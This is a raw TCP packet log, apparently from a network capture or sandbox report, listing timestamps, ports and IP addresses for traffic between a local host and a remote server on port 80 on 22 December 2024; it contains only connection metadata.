Dec 22, 2024 02:16:13.787282944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.787940025 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.788048983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.788069963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.788106918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.788122892 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.788160086 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.788841963 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.788897038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.788964987 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.789002895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.789019108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.789056063 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.789729118 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.789786100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.789846897 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.789882898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.789901972 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.789920092 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.790592909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.790647030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.790725946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.790764093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.790793896 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.790818930 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.791490078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.791543007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.791619062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.791655064 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.791671991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.791704893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.792371035 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.792423010 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.792495966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.792531013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.792546034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.792577028 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.793262959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.793318987 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.793422937 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.793458939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.793478966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.793498993 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.794167995 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.794241905 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.794291973 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.794327974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.794342995 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.794365883 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.795049906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.795116901 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.795176983 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.795212984 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.795228958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.795268059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.795957088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796009064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.796084881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796123028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796133041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.796171904 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.796833992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796888113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.796941996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796977997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.796993971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.797034025 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.797719002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.797775984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.797851086 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.797884941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.797903061 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.797933102 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.798590899 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.798639059 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.798902988 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.798947096 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.799015045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.799050093 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.799062014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.799084902 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.799789906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.799837112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.799901962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.799937010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.799952030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.799973965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.800674915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.800724030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.800790071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.800826073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.800837040 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.800865889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.801572084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.801620960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.801683903 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.801719904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.801727057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.801764011 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.802423954 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.802469969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.802550077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.802586079 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.802603006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.802634954 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.803380966 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.803433895 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.803436041 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.803472042 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.803488970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.803525925 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.804205894 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.804260969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.804341078 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.804378033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.804394960 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.804435015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.805114031 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.805166006 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.805224895 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.805259943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.805279970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.805298090 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.805998087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.806051016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.806094885 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.806130886 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.806148052 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.806185961 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812056065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812108994 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812122107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812150955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812153101 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812191010 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812197924 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812237024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812306881 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812345028 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.812360048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.812397003 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.813055992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.813110113 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970099926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970150948 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970170021 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970190048 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970199108 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970252037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970402002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970458984 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970479965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970516920 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.970532894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.970570087 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.971187115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.971245050 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.971345901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.971386909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.971400023 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.971446037 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.972079992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.972142935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.972187996 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.972223997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.972244978 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.972280979 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.972919941 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.972978115 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.973052979 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.973088026 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.973109007 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.973139048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.973820925 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.973882914 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.973969936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.974006891 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.974024057 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.974059105 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.974699974 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.974755049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.974831104 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.974869013 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.974905014 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.974932909 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.975591898 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.975655079 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.975713968 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.975749969 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.975769997 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.975800991 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.976471901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.976532936 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.976608992 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.976697922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.976715088 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.976752043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.977365017 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.977432013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.977490902 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.977525949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.977555990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.977576971 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.978313923 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.978370905 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.978388071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.978410006 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.978430033 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.978466034 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.979142904 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.979226112 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.979284048 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.979336977 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.979366064 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.979415894 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.980032921 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.980099916 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.980164051 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.980200052 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.980226994 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.980253935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.980917931 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.980986118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.981040955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.981076956 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.981105089 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.981132030 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.981806993 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.981882095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.981983900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.982019901 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.982049942 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.982068062 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.982716084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.982816935 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.982831955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.982868910 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.982897043 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.982918024 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.983567953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.983644009 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.983700991 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.983737946 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.983760118 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.983797073 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.984476089 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.984545946 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.984623909 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.984662056 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.984684944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.984708071 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.985352039 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.985428095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.985488892 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.985523939 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.985604048 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.986244917 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.986315012 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.986381054 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.986418962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.986438990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.986465931 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.987152100 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.987220049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.987309933 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.987361908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.987379074 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.987442017 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.988032103 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.988099098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.988143921 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.988179922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.988203049 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.988228083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.988925934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989006042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.989049911 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989087105 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989110947 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.989136934 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.989800930 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989878893 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.989928007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989963055 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.989986897 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.990005016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.990684032 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.990756989 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.990968943 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.991028070 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.991095066 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.991128922 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.991147041 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.991175890 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.991878033 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.991940975 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.992064953 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.992101908 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.992166042 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.992741108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.992877960 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.992913961 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.992958069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.992985964 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.993709087 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.993818998 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.993855000 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.993899107 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.993946075 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.994532108 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.994600058 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.994668007 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.994704008 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.994724035 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.994754076 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.995404959 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.995474100 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.995542049 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.995579958 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.995599985 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.995625973 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.996310949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.996377945 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.996439934 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.996474981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.996500015 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.996521950 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.997200012 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.997273922 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.997358084 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.997397900 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.997412920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.997534990 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.998094082 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.998163939 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.998208046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.998244047 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:13.998270988 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:13.998291969 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:14.005172968 CET	80	49765	31.41.244.11	192.168.2.4
